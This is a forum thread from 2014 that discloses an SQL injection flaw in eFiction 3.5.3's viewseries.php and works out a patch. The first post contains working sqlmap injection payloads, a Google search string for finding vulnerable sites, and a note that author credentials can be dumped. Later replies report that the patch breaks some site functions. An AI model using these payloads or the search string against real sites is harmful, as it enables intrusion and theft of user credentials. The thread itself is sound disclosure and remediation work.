• June 25, 2017, 12:17:08 PM
• Welcome, Guest. Please login or register.
 
News: It's been a while since we started working on eFiction 5, there's been a lot of starting from scratch and half-scratch, but things are moving on.
Now we need you: please visit the eFicition 5 section of the forum and raise your voice, shape the new face of your favourite fanfiction management software.

Author Topic: SQL Injection vulnerability in eFiction  (Read 8602 times)

robert

  • Newbie
  • *
  • Posts: 1
  • Country: in
  • Thanked: 4 times
SQL Injection vulnerability in eFiction
« on: November 13, 2014, 12:46:24 AM »
Hello ...

The viewseries.php page in eFiction 3.5.3 is vulnerable to an SQL Injection attack.
The page loads the URL parameter "seriesid":

     $seriesid = isset($_GET['seriesid']) ? $_GET['seriesid'] : false;

Then it passes the *tainted* value directly down to the database:

     $parents = dbquery("SELECT s.title, s.seriesid FROM ".TABLEPREFIX."fanfiction_inseries as i,
     ".TABLEPREFIX."fanfiction_series as s WHERE s.seriesid = i.seriesid AND i.subseriesid = '$seriesid'");

This allows an attacker to extract information from the underlying database.

     sqlmap identified the following injection points with a total of 396 HTTP(s) requests:
     ---
     Place: GET
     Parameter: seriesid
         Type: boolean-based blind
         Title: AND boolean-based blind - WHERE or HAVING clause
         Payload: seriesid=1' AND 9530=9530 AND 'xaMV'='xaMV

         Type: error-based
         Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause
         Payload: seriesid=-1947' OR ROW(2257,7329)>(SELECT COUNT(*),CONCAT(0x716e656e71,(SELECT (CASE WHEN (2257=2257) THEN 1 ELSE 0 END)),0x716c746b71,FLOOR(RAND(0)*2))x FROM (SELECT 7852 UNION SELECT 4197 UNION SELECT 3571 UNION SELECT 7903)a GROUP BY x) AND 'zplx'='zplx

         Type: AND/OR time-based blind
         Title: MySQL > 5.0.11 AND time-based blind
         Payload: seriesid=1' AND SLEEP(5) AND 'hXxL'='hXxL
     ---
     [20:37:41] [INFO] testing MySQL
     [20:37:42] [INFO] confirming MySQL
     [20:37:45] [INFO] the back-end DBMS is MySQL
     [20:37:45] [INFO] fetching banner
     [20:37:45] [INFO] retrieving the length of query output
     [20:37:45] [INFO] retrieved: 20
     [20:38:25] [INFO] retrieved: 5.1.69-community-log
     [20:38:25] [INFO] actively fingerprinting MySQL
     [20:38:28] [INFO] executing MySQL comment injection fingerprint
     web application technology: Apache, PHP 5.2.17
     back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0
               banner parsing fingerprint: MySQL 5.1.69, logging enabled
     banner:    '5.1.69-community-log'

Vulnerable sites can be found using Google by executing this search:

     inurl:"viewseries.php?seriesid="

The complete list of usernames/passwords can be obtained by dumping the fanfiction_authors table.

Anybody running eFiction 3.5.3 should be advised that their user credentials are available to the public.

 ... Robert
The following users thanked this post: Elle, Sue, SJP, Sheepcontrol

Sheepcontrol

  • Administrator
  • Veteran
  • ****
  • Posts: 274
  • Country: de
  • Thanked: 48 times
Re: SQL Injection vulnerability in eFiction
« Reply #1 on: November 13, 2014, 09:31:18 AM »
UPDATE: zip-archive attached with the modified files.

Thanks for letting us know, here's a fix, and YOU NEED TO DO THIS A.S.A.P.

Step 1:
Open includes/mysqli_functions.php, find:

Code: [Select]
// Used to escape text being put into the database.
function escapestring($str) {
global $dbconnect;
   return $dbconnect->real_escape_string($str);
}

Modify to:
Code: [Select]
// Used to escape text being put into the database.
function escapestring($str) {
global $dbconnect;
   if (!is_array($str)) return $dbconnect->real_escape_string($str);
   return array_map('escapestring', $str);
}

(You can skip step 2 if you know are using mysqli extension, if you are not sure, better do it.)
Step 2:
Open includes/mysql_functions.php, find at or around line 56:
Code: [Select]
// Used to escape text being put into the database.
function escapestring($str) {
   if(version_compare(phpversion(),"4.3.0")=="-1") {
     $str = mysql_escape_string($str);
   } else {
     $str = mysql_real_escape_string($str);
   }
   return $str;
}

Modify to:
Code: [Select]
// Used to escape text being put into the database.
function escapestring($str) {
   if (!is_array($str)) return mysql_real_escape_string($str);
   else return array_map('escapestring', $str);
}

This will no longer probe for PHP versions before 4.3.0, but honestly, this would mean your web server has not been updated since around 2003.

Step 3:
Completely scratched for breaking several forms.

Step 4:
Open viewseries.php, find around line 36:
Code: [Select]
include(_BASEDIR."includes/pagesetup.php");


$seriesid = isset($_GET['seriesid']) ? $_GET['seriesid'] : false;

change last line of above to:
Code: [Select]
$seriesid = (isset($_GET['seriesid']) && is_numeric($_GET['seriesid'])) ? escapestring($_GET['seriesid']) : false;

First tests indicate this is
1) working
2) fixing the injection issue
3) should work now

Update #1: Added viewseries.php as file to be modified
Update #2: Fixed a typo above, Step 1 hits includes/mysqli_functions.php, Step 2 goes for includes/mysql_functions.php
Update #3: Convenience fix, packed the affected files in a zip-archive, just unpack and upload, do not edit anything else.

I am sorry, this may seem a bit unorganized, and in fact it is, which has to do with the fact that I am not really into the 3.5.3 code, I merely took the project over with the intention of bringing it to version 5.0.0, which is underway, but not quite ready for release.

Updated package is postponed, also, until this fix has become somewhat stable.
« Last Edit: November 14, 2014, 08:16:17 PM by Sheepcontrol »
I speak the worlds most widely used language: bad english
The following users thanked this post: Purpleyin, Ariane, Sue, banshee, kaehana

Sheepcontrol

  • Administrator
  • Veteran
  • ****
  • Posts: 274
  • Country: de
  • Thanked: 48 times
Re: SQL Injection vulnerability in eFiction
« Reply #2 on: November 13, 2014, 11:31:09 AM »
Ran a test, because $seriesid is straight forward used to build links, it still shows up as injected, but the actual DB query is safe.
I speak the worlds most widely used language: bad english
The following users thanked this post: kaehana

kaehana

  • Newbie
  • *
  • Posts: 3
  • Country: es
  • Thanked: 1 times
Re: SQL Injection vulnerability in eFiction
« Reply #3 on: November 13, 2014, 12:51:12 PM »
I did this change but now when I click submit button everything is OK but when I want to echo inserted text, it shows between the lines "rn" (in database shows \r\n). I tried to remove these tags but it doesn't disapear. How could I remove these tags?
The following users thanked this post: Sheepcontrol

Purpleyin

  • Veteran
  • ***
  • Posts: 120
Re: SQL Injection vulnerability in eFiction
« Reply #4 on: November 13, 2014, 12:54:04 PM »
(You can skip step 2 if you know are using mysqli extension, if you are not sure, better do it.)
Step 2:
Open includes/mysqli_functions.php, find at or around line 56:
Code: [Select]
// Used to escape text being put into the database.
function escapestring($str) {
   if(version_compare(phpversion(),"4.3.0")=="-1") {
     $str = mysql_escape_string($str);
   } else {
     $str = mysql_real_escape_string($str);
   }
   return $str;
}

Modify to:
Code: [Select]
// Used to escape text being put into the database.
function escapestring($str) {
   if (!is_array($str)) return mysql_real_escape_string($str);
   else return array_map('escapestring', $str);
}

This will no longer probe for PHP versions before 4.3.0, but honestly, this would mean your web server has not been updated since around 2003.

I couldn't find that code in includes/mysqli_functions.php but could in includes/mysql_functions.php, so was assuming there's a tiny typo in step 2 or am I wrong and my files are different than expected somehow?

Sheepcontrol

  • Administrator
  • Veteran
  • ****
  • Posts: 274
  • Country: de
  • Thanked: 48 times
Re: SQL Injection vulnerability in eFiction
« Reply #5 on: November 13, 2014, 01:25:20 PM »

I couldn't find that code in includes/mysqli_functions.php but could in includes/mysql_functions.php, so was assuming there's a tiny typo in step 2 or am I wrong and my files are different than expected somehow?

Yes, there was a typo in the instructions, Step 1 was mysqli, Step 2 mysql.
Thanks
« Last Edit: November 13, 2014, 01:50:48 PM by Sheepcontrol »
I speak the worlds most widely used language: bad english

Sheepcontrol

  • Administrator
  • Veteran
  • ****
  • Posts: 274
  • Country: de
  • Thanked: 48 times
Re: SQL Injection vulnerability in eFiction
« Reply #6 on: November 13, 2014, 01:26:31 PM »
I did this change but now when I click submit button everything is OK but when I want to echo inserted text, it shows between the lines "rn" (in database shows \r\n). I tried to remove these tags but it doesn't disapear. How could I remove these tags?

Holy Batman, fired a bit too far here ^^

I changed the instructions above, in short terms: changes in the config.php modification, edit an additional file.
« Last Edit: November 13, 2014, 01:49:31 PM by Sheepcontrol »
I speak the worlds most widely used language: bad english
The following users thanked this post: kaehana

kaehana

  • Newbie
  • *
  • Posts: 3
  • Country: es
  • Thanked: 1 times
Re: SQL Injection vulnerability in eFiction
« Reply #7 on: November 13, 2014, 02:10:56 PM »

Holy Batman, fired a bit too far here ^^

I changed the instructions above, in short terms: changes in the config.php modification, edit an additional file.

Thank you, now its ok

Sheepcontrol

  • Administrator
  • Veteran
  • ****
  • Posts: 274
  • Country: de
  • Thanked: 48 times
Re: SQL Injection vulnerability in eFiction
« Reply #8 on: November 13, 2014, 02:27:12 PM »
Thanks for the feedback, good to know.
I speak the worlds most widely used language: bad english

darklight

  • Veteran
  • ***
  • Posts: 324
  • Country: 00
Re: SQL Injection vulnerability in eFiction
« Reply #9 on: November 13, 2014, 03:39:17 PM »
Thank you for getting on this so quick!

kaehana

  • Newbie
  • *
  • Posts: 3
  • Country: es
  • Thanked: 1 times
Re: SQL Injection vulnerability in eFiction
« Reply #10 on: November 13, 2014, 03:53:26 PM »
Series doesnt show whit

Code: [Select]
$seriesid = (isset($_GET['seriesid']) && is_numeric($_GET['seriesid'])) ? escapestring($_GET['seriesid']) : false;I get error in line 39 viewseries.php.

But its ok if I use:

Code: [Select]
$seriesid = isset($_GET['seriesid']) && is_numeric($_GET['seriesid']) ? escapestring($_GET['seriesid']) : false;
I dont know if it is ok to use this last code
« Last Edit: November 13, 2014, 03:56:59 PM by kaehana »

Sheepcontrol

  • Administrator
  • Veteran
  • ****
  • Posts: 274
  • Country: de
  • Thanked: 48 times
Re: SQL Injection vulnerability in eFiction
« Reply #11 on: November 13, 2014, 04:08:58 PM »
Series doesnt show whit

Code: [Select]
$seriesid = (isset($_GET['seriesid']) && is_numeric($_GET['seriesid'])) ? escapestring($_GET['seriesid']) : false;I get error in line 39 viewseries.php.

But its ok if I use:

Code: [Select]
$seriesid = isset($_GET['seriesid']) && is_numeric($_GET['seriesid']) ? escapestring($_GET['seriesid']) : false;
I dont know if it is ok to use this last code

Now I have no idea why that doesn't work for you, double checked with my test site and it's just fine there, but your version seems to be ok, too.
I speak the worlds most widely used language: bad english

Sue

  • Veteran
  • ***
  • Posts: 122
  • Country: au
Re: SQL Injection vulnerability in eFiction
« Reply #12 on: November 13, 2014, 07:48:04 PM »
Whoa - thanks Robert for the quick spot and thanks Sheepie for the fix.

Charl

  • Newbie
  • *
  • Posts: 11
Re: SQL Injection vulnerability in eFiction
« Reply #13 on: November 13, 2014, 10:05:32 PM »
A quick search didn't find those lines of code in the files. There was similar code but not the same.

Please hurry up on the fixed version as at least I can upload that!

Sheepcontrol

  • Administrator
  • Veteran
  • ****
  • Posts: 274
  • Country: de
  • Thanked: 48 times
Re: SQL Injection vulnerability in eFiction
« Reply #14 on: November 14, 2014, 01:54:58 AM »
A quick search didn't find those lines of code in the files. There was similar code but not the same.

Please hurry up on the fixed version as at least I can upload that!

I copied the code from an original version of eFiction 3.5.3, so if you files did indeed differ, that's strange.
Anyway, couldn't sleep so made the hotfix, full package including a few other fixes that came up within the next days, got family festivities coming my way.
I speak the worlds most widely used language: bad english

SJP

  • Member
  • **
  • Posts: 62
    • Elysian Fields
Re: SQL Injection vulnerability in eFiction
« Reply #15 on: November 14, 2014, 03:03:45 PM »
Thank you, Robert for pointing this out, and thank you, Sheepcontrol for working on the fix.

I wanted to point out that the 2 lines of code that were previously added to the config.php file, and now are listed for the dbfuctions.php file:
Code: [Select]
$_GET = array_map('stripslashes', $_GET);
$_POST = array_map('stripslashes', $_POST);
May help with the SQL injection issue, but they throw off some of the site functionality. A member of my site emailed me to let me know that when she was trying to add a challenge, the site wouldn't save the characters she was trying to tie to the challenge. I checked, and she was correct. It looks like any input that comes from a box where multiple options can be chosen is being disregarded (for ex. in the advanced search it won't use selected classtypes to include/exclude).

babaca

  • Global Moderator
  • Veteran
  • ****
  • Posts: 1213
  • Thanked: 1 times
    • babaca fanfics
Re: SQL Injection vulnerability in eFiction
« Reply #16 on: November 14, 2014, 03:50:41 PM »
UPDATE: zip-archive attached with the modified files.


Updated package is postponed, also, until this fix has become somewhat stable.

Sheep, I think you are great to tackle this problem but I'm confused... is there an attachment on your post or not? I see a paperclip on the header like there is an attachment but I could find no link. I will attempt to manually alter my files, but if I do, will I screw something up? Seems like there are some unpredictable results.

******************************************
Mucking around in eFiction since circa 2001 (ver. 1.0)
Now running v.3

Sheepcontrol

  • Administrator
  • Veteran
  • ****
  • Posts: 274
  • Country: de
  • Thanked: 48 times
Re: SQL Injection vulnerability in eFiction
« Reply #17 on: November 14, 2014, 08:08:38 PM »
Thank you, Robert for pointing this out, and thank you, Sheepcontrol for working on the fix.

I wanted to point out that the 2 lines of code that were previously added to the config.php file, and now are listed for the dbfuctions.php file:
Code: [Select]
$_GET = array_map('stripslashes', $_GET);
$_POST = array_map('stripslashes', $_POST);
May help with the SQL injection issue, but they throw off some of the site functionality. A member of my site emailed me to let me know that when she was trying to add a challenge, the site wouldn't save the characters she was trying to tie to the challenge. I checked, and she was correct. It looks like any input that comes from a box where multiple options can be chosen is being disregarded (for ex. in the advanced search it won't use selected classtypes to include/exclude).

Darn, that's what I was fearing. Well, as I said, I don't know the code very well, ok, scratch that as well - I need to finish v5 ASAP :(
I speak the worlds most widely used language: bad english

babaca

  • Global Moderator
  • Veteran
  • ****
  • Posts: 1213
  • Thanked: 1 times
    • babaca fanfics
Re: SQL Injection vulnerability in eFiction
« Reply #18 on: November 14, 2014, 08:13:27 PM »

Darn, that's what I was fearing. Well, as I said, I don't know the code very well, ok, scratch that as well - I need to finish v5 ASAP :(

Hey I'm ready to beta test v5 whenever you are ready.  :agree:
« Last Edit: November 14, 2014, 11:56:11 PM by babaca »
******************************************
Mucking around in eFiction since circa 2001 (ver. 1.0)
Now running v.3

jetblack

  • Member
  • **
  • Posts: 45
  • Country: us
    • AdAstra Star Trek Fanfiction Archive
Re: SQL Injection vulnerability in eFiction
« Reply #19 on: November 14, 2014, 10:51:09 PM »
I'm getting a bunch of reports from authors stating that "rn" is being added to each line since I applied the hotfix.  Here's an example:

http://www.adastrafanfic.com/viewstory.php?sid=2061&chapter=37

No matter what I do on the HTML editor side, I cannot remove those characters.  They persist over and over.

-- jb
Archive: Ad Astra Star Trek Fanfiction Archive
Version: 3.5.3
Skin: One of Kali's, but I'm not sure.  It's been heavily modded.
PHP: 5.0
MySQL: 5.5